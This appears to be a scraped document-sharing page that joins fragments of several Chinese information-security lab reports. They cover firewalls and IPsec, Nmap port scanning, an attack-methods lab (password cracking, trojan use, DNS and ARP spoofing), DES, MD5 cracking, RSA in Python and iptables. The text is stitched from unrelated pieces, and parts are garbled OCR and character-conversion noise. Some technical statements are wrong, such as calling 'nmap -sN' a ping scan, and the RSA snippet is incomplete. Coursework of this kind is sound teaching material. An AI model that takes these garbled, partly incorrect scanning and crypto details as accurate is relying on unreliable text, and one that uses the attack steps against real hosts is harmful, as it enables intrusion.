, , 实 验 报 告 实验名称 防火墙和安全 IP 实验 指导教师 沈苏彬、王光辉 实验类型 上机 实验学时 8 实验时间 2015-10-21/22/29 一、 实验目的和要求 (1)理解防火墙技术和安全 IP 技术的原理 (2)掌握个人电脑的防火墙、安全 IP 的配置方法。 (3)完成防火墙的配置和测试、安全 IP 的配置和测试、以及基于报文嗅探软件 的测试。 要求独立完成实验方案的设计、配置和测试;要求独立完成实验报告的编写。 二、实验环境(实验设备) 硬件:微机 软件:嗅探软件 Wireshark ,Windows 系统 三、实验原理及内容 实验 1:安全 IP 实验。两个同学为一组进行试验;如果没有找到合作进行实验的 同学,并且存在多余的实验电脑,则可以一位同学通过两台电脑完成实验。 1.1 实验和测试在没有安全 IP 保护的网络环境下的网络安全危险:实验和测试在 没有安全保护的情况下,通过嗅探报文可以看到在同一个网段内传送的所有 IP 报文以 及这些 IP 报文包括的内容,例如可以通过 Ping 另一台电脑,通过嗅探软件,测试是否 能够分析出 Ping 报文。 1.2 配置和测试安全 IP :在两台电脑上配置安全 IP 策略,选择安全关联建立的方 法(例如:采用基于共享密钥的安全关联建立方式),通过嗅探软件,观察和分析安全 IP 的安全关联建立过程,以及嗅探软件可以窥探到安全 IP 报文的哪些内容。 1.3 通过嗅探软件,对照安全 IP 的原理,观察和分析安全 IP 的特性,例如观察 安全 IP 的面向连接特性等。 实验 2:防火墙实验。两个同学为一组进行试验;如果没有找到合作进行实验的 同学,并且存在多余的实验电脑,则可以一位同学通过两台电脑完成实验。 2.1 通过配置防火墙的“入站规则”和“出站规则” 实现访问控制列表中对某台 联网电脑访问设置防火墙电脑的限制,以及设置防火墙电脑对某台联网电脑访问限制, 并且通过相关网络应用(例如 Ping ),测试防火墙的作用。 2.2 通过配置防火墙的“入站规则”和“出站规则” 实现访问控制列表中对某类 应用(例如基于 ICMPv4 的 Ping )访问设置防火墙电脑的限制,以及设置防火墙电脑对 某类应用(例如基于 ICMPv4 的 Ping )访问限制,并且通过对该应用的使用,测试防火 墙的作用。 2.3 配置和验证自己认为具有实际应用价值的个人电脑防火墙规则,并且测试该 防火墙的作用。 2.4 罗列以上防火墙配置对应的访问控制列表。

信息安全实验报告四

实验成绩 《信息安全概论》实验报告--------- 实验四网络端口扫描实验 一、专业班级:学号:姓名:完成时间:2016/ 05/ 09 二、实验目的 学习端口扫描技术的基本原理,理解端口扫描技术在网络攻防中的应用;熟练掌握目前最为常用的网络扫描工具Nmap的使用,并能利用工具扫描漏洞,更好地弥补安全不足。 二、实验内容 选择局域网中的主机作为扫描对象,使用Nmap提供的默认配置文件,以及自行设定相关参数,对制定范围的主机进行PING扫描、TCP connect扫描、UDP扫描、秘密扫描等,记录并分析扫描结果。 三、实验环境和开发工具 1. Win dows 7 操作系统 2. Zenmap 5.21 四、实验步骤和结果 1. 全面TCP扫描 这是一种基本的扫描模式,不需要任何命令选项开关,即可对目标主机进行全面TCP 扫描,显示监听端口的服务情况。 命令行格式为:nmap - sS - v IP地址,例如nmap - sS - v 172.18.69.173,则可对目标

主机172.18.69.173进行全面TCP扫描,结果下图:

ItllL MM I H UPGlz : v - wK^iw«-ri . Htm 丄》 时OM MOJiRi Ofl I 口ED liXftMl-HiS 扫描模式的缺点:日志服务的主机可以很容易地监测到这类扫描。要达到隐蔽功能,必 须设置一 些命令选项开关,从而实现较高级的功能。 2、PING 扫描 如果想知道网络上有哪些主机是开放的,格式为: nmap - sN 172.18.69.173,则可对目 标主机172.18.69.173进行探测,输出结果包括开放主机的IP 地址和MAC 地址,如图所示 ■ ■- ・ *■■■■? nW & Mil#. m |K] 4^T ; 111 I'fll :SHln«iP>nm

《网络信息安全》网络与系统攻击方法实验报告一

《网络信息安全》网络与系统攻击方法实验报告

三、实验过程和结论:(实现方法、步骤、流程图、分析等) 1.寻找具备web服务、ftp服务、远程桌面服务的主机,然后在另一台主机上访问这些服务,获得服务器的ip地址、服务的端口、操作系统类型、网络结构、是否有防护措施等信息。如果找不到具有这些服务的主机,请自行架设。 2.自行架设具备web服务、ftp服务、远程桌面服务的主机,然后在另一台主机上访问这些服务(可向云计算服务提供商申请互联网虚拟主机),了解常见服务的架设过程。 3.通过互联网第3方资源调查目标主机信息。(可以但不局限于使用WHOIS、钟馗之眼等资源) 4.利用网络扫描工具扫描某个地址段,调查主机的存在情况。然后选择一台主机,调查其网络服务的开启情况和其他信息。对扫描的结果进行分析。

5.利用相关工具实施网络嗅探,使用过滤功能分析抓取的数据包,看看能得到哪些敏感的信息,分析嗅探可能造成的后果。分析如何防范网络嗅探。 6.利用相关工具在Windows操作系统上查看其他用户的登录名和口令。修改用户登录口令后再进行破解,分析口令复杂性对破解难度的影响,分析口令攻击的防范方法。 7.利用“冰河”或其他类型的木马实施攻击(该实验需要2名同学合作完成)。查询相关资料,分析该木马的启动和隐藏方式,以及清除的方法。分析利用木马程序实施攻击的原理以及防范的方法。

8.验证修改host文件进行DNS欺骗的攻击方式,分析其危害,分析对这种攻击方式的防范方法。 9.(选做)使用攻击工具进行ARP欺骗攻击,分析ARP攻击发送的数据包,分析其危害及对这种攻击的防范方法。

信息安全技术实验报告

〞信息平安技术〞 实验报告 学院计算机科学与工程学院 学号

实验一、DES加解密算法 一、实验目的 1. 学会并实现DES算法 2. 理解对称密码体制的根本思想 3. 掌握数据加密 和解密的根本过程 二、实验容 根据DES加密标准,用C++设计编写符合DES算法思想的加、解密程序,能够实现对字符串和数组的加密和解密。 三、实验的原理 美国IBM公司W. T uchman 和C. Meyer 1971-1972年研制成功。1967年美国Horst Feistel提出的理论。 美国国家标准局〔NBS)1973年5月到1974年8月两次发布通告,公开征求用于电子计算机的加密算法。经评选从一大批算法中采纳了IBM的LUCIFER方案。 DES算法1975年3月公开发表,1977年1月15日由美国国家标准局公布为联邦数据加密标准〔Data Encryption Standard〕,于1977年7月15日生效。 为二进制编码数据设计的,可以对计算机数据进展密码保护的数学运算。DES 的性仅取决于对密钥的,而算法是公开的。64位明文变换到64位密文,密钥64位,实际可用密钥长度为56位。

运行结果: 四、思考题 1.分析影响DES密码体制平安的因素〞 答: 影响DES密码体制平安的因素主要是密钥的强健性。 2.公钥算法中加密算法和解密算法有何步骤〞

答:DES密码体制中加密算法和解密算法流程一样,区别在于解密使用的子密钥和加密的子密钥相反 实验二、操作系统平安配置 一、实验目的 1.熟悉Windows NT/XP/2000系统的平安配置2. 理解可信计算机评价准那么 二、实验容 1.Windows系统注册表的配置 点击“开场\运行〞选项,键入“regedit〞命令翻开注册表编辑器,学习并修改有关网络及平安的一些表项 2.Windows系统的平安效劳 a.翻开“控制面板\管理工具\本地平安策略〞,查阅并修改有效工程的设置。b.翻开“控制面板\管理工具\事件查看器〞,查阅并理解系统日志,选几例,分析并说明不同类型的事件含义。 3. IE浏览器平安设置 翻开Internet Explorer菜单栏上的“工具\Internet选项〞,调整或修改“平安〞、“隐私〞、“容〞等栏目的设置,分析、观察并验证你的修改。 4. Internet 信息效劳平安设置 翻开“控制面板\管理工具\Internet 信息效劳〞,修改有关网络及平安的一些设置,并启动或FTP效劳器验证〔最好与邻座同学配合〕。 三、实验过程

《信息安全》实验报告3 MD5的计算和破解

《信息安全》实验报告(3) 实验名称:________________ 指导教师:___________ 完成日期: ________________ 专 业:________________ 班 级:___________ 姓 名:________________ 一、实验目的: 理解数字摘要的原理;能够利用现有软件工具进行MD5摘要的计算; 了解MD5在实际数据库应用系统中的应用;能够进行简单的MD5摘要破解。 二、实验内容: 1、自行寻找一款能够计算文件MD5摘要值的软件,对一个文本文件(或其他类型文件)进行摘要值计算并记录。将该文件内容进行稍许修改后再进行一次摘要值计算并记录,比较两次摘要值。 2、自行寻找一款能够计算字符串MD5摘要值的软件,对一个任意字符串进行摘要值计算并记录。对该字符串内容进行稍许修改后再进行一次摘要值计算并记录,比较两次摘要值。 3、自行寻找方法找到以下三个md5值的原文(字符串) 3508d8fedc70d04c5d178dbbc2eac72a (7位,纯数字) ef73781effc5774100f87fe2f437a435(8位,数字+字母) 909cc4dab0b2890e981533d9f27aad97(8位,数字+字母+特殊符号) 三、实验过程:(实现步骤等) 使用Hash 1.04版的计算MD5值软件,如下: MD5的计算和破解 于泳海 2014-11-6 信息管理与信息系统 11级新本班 贾文丽

计算某一文件的MD5,将文件进行更改后,查看两次MD5值,如下:更改文件后:

四、实验结果与结论: 将两次文件的MD5进行比较 我们发现,同一文件如果进行修改,内容上出现一个字符的不同都会导致其MD5校验不同。 五、实验总结:(实验中遇到的问题及解决方法,心得体会等) 在本节实验中,理解了数字摘要的原理并能够利用现有软件工具进行MD5摘要的计算,而且了解了MD5在实际数据库应用系统中的应用并能够进行简单的MD5摘要破解。老师让我们在网上搜集了很多了相关文件进行联系,了解了MD5的破解方法。

《信息安全》实验报告3MD5的计算和破解

《信息安全》实验报告3MD5的计算和破解 实验目标: 1.了解MD5算法的基本原理。 2.掌握MD5算法的计算和应用。 3.理解MD5算法的弱点,并尝试破解MD5哈希值。 一、实验原理: MD5(Message Digest Algorithm 5)是一种常用的消息摘要算法,用来确保数据的完整性和一致性,广泛应用于信息安全领域中。MD5将任意长度的输入数据进行计算,得到一个128位的哈希值。 实验步骤: 1.编写MD5的计算代码。 2.编写MD5的破解代码。 3.运行代码,计算给定字符串的MD5哈希值。 4.破解给定MD5哈希值。 二、实验过程: 1.MD5的计算代码编写: MD5算法的计算过程包括四个主要的步骤:填充位、增加长度、初始化变量和循环计算。 a.填充位:将待计算的消息填充至512位的倍数,填充位为1后面加零。

b.增加长度:在填充消息后增加一个64位的二进制数,表示原始消息的长度。 c.初始化变量:设定固定的四个变量,用于循环计算。 d.循环计算:将填充后的消息分为512位的块进行循环计算,计算结果与前一块的结果进行累加。 2.MD5的破解代码编写: MD5的破解目标是通过已知的MD5哈希值,找到对应的原始数据。一般的方法是尝试不同的输入数据,计算MD5哈希值,然后与已知的哈希值进行比较。 a.枚举法:通过不断尝试不同的输入数据,计算MD5哈希值与给定哈希值进行比较,直到找到对应的原始数据。 b.字典法:通过预先准备好的字典文件,将字典中的每个词进行MD5哈希计算,然后与给定哈希值进行比较,查找对应的原始数据。 3.实验结果展示: 4.MD5的破解: a.枚举法:从'a'到'z'的26个字符中依次尝试,计算MD5哈希值并与给定值进行比较,直到找到对应的原始数据。 b.字典法:根据常见密码字典构建一个文本文件,逐行读取文件中的词进行MD5哈希计算并与给定值进行比较,直到找到对应的原始数据。5.实验总结:

信息安全-RSA加密算法实验报告

信息安全-RSA加密算法实验报告 RSA加密算法是一种非对称加密算法,它能够保障信息的安全性,被广泛应用于各种领域。本次实验的目的是深入理解RSA加密算法的原理和应用,掌握RSA算法的加密和解密过程,并进行相应的实验操作。 一、具体实验操作 1.1 生成RSA密钥对 在Python中引入RSA模块,使用generate方法生成RSA密钥对。密钥长度为1024位,生成的公钥和私钥分别保存在public.pem和private.pem两个文件中。 ``` from Crypto.PublicKey import RSA # 生成RSA密钥对 key = RSA.generate(1024) # 分别保存到public.pem和private.pem文件中 with open('public.pem', 'wb') as f: f.write(key.publickey().exportKey()) 1.2 加密和解密 加密和解密的过程中,首先读入公钥和私钥,分别使用公钥对信息进行加密,私钥对密文进行解密。 # 测试加密和解密 message = 'RSA加密算法实验' print(f"原始信息:{message}") ciphertext = encrypt(message) print(f"密文:{ciphertext}") message = decrypt(ciphertext) print(f"解密后信息:{message}")

``` 二、结果分析 经过实验操作,我们发现RSA加密算法实现了高强度的信息加密和解密,确实能够有 效保障信息的安全性。下面对RSA算法的加密和解密过程进行详细的分析。 2.1 密钥产生 RSA算法的优势在于它的非对称密码系统,即公钥加密,私钥解密;私钥加密,公钥 解密。RSA的安全基于大质数分解理论,具体来说,是利用了存在一个大因子分解困难的数,对于多种攻击手段都有较好的抵御力度。 在本次实验中,我们使用Python的RSA模块,生成了一个1024位的RSA密钥对,其 中包括了一个公钥和一个私钥。公钥是公开的,可以用来加密信息,私钥是保密的,只有 拥有该私钥的用户才能解密信息。 2.2 加密过程 在RSA加密算法中,发送者使用接收者的公钥对原始信息进行加密,接收者使用自己 的私钥将加密后的密文解密。 在本次实验中,我们使用Python的RSA模块,读入了生成的公钥,并使用 PKCS1_OAEP.new对原始信息进行加密。其中,PKCS1_OAEP是一种填充方案,能够保证密文的安全性和唯一性。 三、结论 RSA加密算法是一种基于大质数分解理论的非对称加密算法,经过实验,我们发现RSA 算法的加密和解密过程非常简单,用户只需要生成两个RSA密钥对,即可实现高强度的信 息加密和解密。RSA算法在各个领域中都得到了广泛的应用,如SSL/TLS协议、数字签名、身份认证等。它的高强度和可靠性,保障了信息的安全性,具有非常重要的应用价值。

信息安全实验报告Linux下的防火墙配置

【实验6】 使用iptables 实现防火墙 一、 实验目的: 1. 掌握iptables 命令的语法。 2. 掌握Linux 下防火墙的配置。 二、 【实验环境】 1. 虚拟机软件VM Ware 6.0,Redhat Enterprise Linux 虚拟机或光盘镜像文件。 2. 3台以上机器组成的局域网。 三、 实验内容: 某单位由于业务需要,假设了3台服务器,分别提供WWW 服务、FTP 服务和电子邮件服务。 该单位拥有一个局域网,IP 地址范围是192.168.1.0/24;使用一台Linux 主机配置包过滤防火墙以保护内部网络的安全,该Linux 主机有两个网络接口: eth0: 192.168.1.1,用于连接内网。 Eth1: 218.98.1.26,用于连接外网(internet )。 三台服务器的IP 地址分别为: WWW 服务器:192.168.1.11 FTP 服务器:192.168.1.12 电子邮件服务器:192.168.1.13 WWW 192.168.1.11 FTP 192.168.1.12

这个实验中以虚拟机模拟Linux防火墙 四、实验步骤 1、配置内网和外网接口的网络参数 内网接口eth0:192.168.1.1 子网掩码:255.255.255.0 外网接口eth0:218.98.1.26 子网掩码:255.255.255.0

2、建立脚本文件,使防火墙在Linux启动时自动运行。 在/etc/rc.d目录下建立一个名为“filter-firewall”的文件; 打开/etc/rc.d目录下的rc.local文件,在最后一行添加:/etc/rc.d/filter-firewall 保存,退出。

信息安全实验报告des加密算法

中北大学大学软件学院"网络攻击与防御" 实验报告 计算机科学与技术学院 计算机系网络教研室制

一、实验目的 通过用DES算法对实际数据进展加密和解密来深刻了解DES的运行原理,进而加深对对称加密算法的理解与认识。 预备知识: 1〕数据加密标准〔DES,Data Encryption Standard〕是一种使用密钥加密的块密码,1976年被美国联邦政府的国家标准局确定为联邦资料处理标准〔FIPS〕,随后在国际上广泛流传开来。它基于使用56位密钥的对称算法。这个算法因为包含一些设计元素,相对短的密钥长度以及疑心含美国国家平安局〔NSA〕的后门而在开场时有争议,因此DES因此受到了强烈的学院派式的审查,并以此推动了现代的块密码及其密码分析的开展。 2) DES算法的入口参数有三个:Key、Data、Mode。其中Key为8个字节共64位,是DES算法的工作密钥;Data也为8个字节64位,是要被加密或被解密的数据;Mode为DES的工作方式,有两种:加密或解密。 3〕DES算法的平安性,DES现在已经不是一种平安的加密方法,主要因为它使用的56位密钥过短。1999年1月,https://www.360docs.net/doc/7719288742.html,与电子前哨基金会合作,在22小时15分钟即公开破解了一个DES密钥。也有一些分析报告提出了该算法的理论上的弱点,虽然在实际中难以应用。为了提供实用所需的平安性,可以使用DES的派生算法3DES来进展加密,虽然3DES也存在理论上的攻击方法。在2001年,DES作为一个标准已经被高级加密标准〔AES〕所取代。 4〕对称密码算法〔Symmetric cipher〕:加密密钥和解密密钥一样,或实质上等同,即从一个易于推出另一个。又称传统密码算法〔Conventional cipher)、秘密密钥算法或单密钥算法。

信息安全-网络扫描与嗅探实验报告

学号: 网络扫描与嗅探实验报告 课程信息安全技术 学院信息工程学院 专业电子信息工程 班级 姓名 教师 2016 年5月26日

一.实验目的 (1)理解网络嗅探和扫描器的工作机制和作用。 (2)学习抓包与协议分析工具Wire shark的使用。 (3)掌握利用扫描器进行主动探测,收集目标信息的方法。(4)掌握使用漏洞扫描器检测远程或本地主机安全性漏洞。 二.实验器材与工具 PC机,Wire shark软件,局域网环境,superscan软件 三.实验容 1.认真阅读和掌握与网络嗅探和网络扫描相关的知识点。 2.上机用Wire shark和superscan软件实现实验操作。 3.记录实验结果,并加以分析生成实验报告。 四.实验步骤及结果 1.网络嗅探 使用Wire shark抓包并进行协议分析 (1)下载并安装Wire shark软件,打开界面如下图1。

图1 (2)单击“捕获”→“选项”,选择“无线网络连接”,再单击“开始”,捕获过滤器选tcp,如图2。 图2 (3)使用Wireshark数据报获取,抓取TCP数据包并进行分析。从抓取的 数据包来看,首先关于本次分析的数据包是典型的TCP三次握手,如 下图3所示。

图3 其中,第一次握手是建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SENT状态,等待服务器确认;SYN:同步序列编号(Synchronize Sequence Numbers)。 第二次握手是服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态。 第三次握手是客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包发送完毕,客户端和服务器进入ESTABLISHED(TCP 连接成功)状态,完成三次握手。 完成三次握手,客户端与服务器开始传送数据。 (4)TCP三次握手过程分析(以第一次握手为例) source(192.168.1.108)发送一个连接请求到destination (117.131.204.120),第一个TCP包的格式如下图4所示。 图4 第三行是ipv4的报文,网际协议IP是工作在网络层,也就是数据链路层的上层,IPv4报文中的源地址和目的地址是ip地址,版本号TCP是6,其格式为

相关文档
最新文档